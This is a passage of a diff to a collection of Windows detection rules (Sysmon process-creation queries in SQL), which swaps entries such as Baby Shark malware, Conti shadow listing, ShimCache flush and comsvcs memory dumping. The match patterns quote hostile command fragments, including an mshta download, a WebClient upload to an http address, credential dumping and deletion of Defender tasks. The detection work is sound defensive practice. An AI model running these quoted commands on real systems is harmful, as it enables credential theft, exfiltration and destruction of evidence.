'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnx.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_soundrecorder_audio_capture.yml" + "filename": "proc_creation_win_lolbin_dnx.yml" }, { - "title": "Application Whitelisting Bypass via Dxcap.exe", - "id": "60f16a96-db70-42eb-8f76-16763e333590", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects execution of of Dxcap.exe", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ + "attack.execution", "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", "attack.t1218" ], "falsepositives": [ - "Legitimate execution of dxcap.exe by legitimate user" + "Administrative scripts", + "Microsoft SCCM" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", - "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Userinit Child Process", + "id": "b655a06a-31c0-477a-95c2-3726b83d649d", + "status": "test", + "description": "Detects a suspicious child process of userinit", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_susp_userinit_child.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.g0020", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027.004" ], "falsepositives": [ - "Unlikely" + "Utilization of this tool should not be seen in enterprise environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "Suspicious Execution of Taskkill", + "id": "86085955-ea48-42a2-9dd3-85d4c36b167d", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR OriginalFileName = 'taskkill.exe') AND (CommandLine LIKE '% /f%' ESCAPE '\\' AND CommandLine LIKE '% /im %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_taskkill_execution.yml" }, { - "title": "Php Inline Command Execution", - "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_php_inline_command_execution.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", - "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "status": "experimental", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "Active Directory Structure Export Via Ldifde.EXE", - "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ldifde_export.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Use Icacls to Hide File to Everyone", - "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "status": "experimental", - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "author": "frack113", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1036" ], "falsepositives": [ - "Legitimate use" + "Exotic software" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'iCACLS.EXE' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' 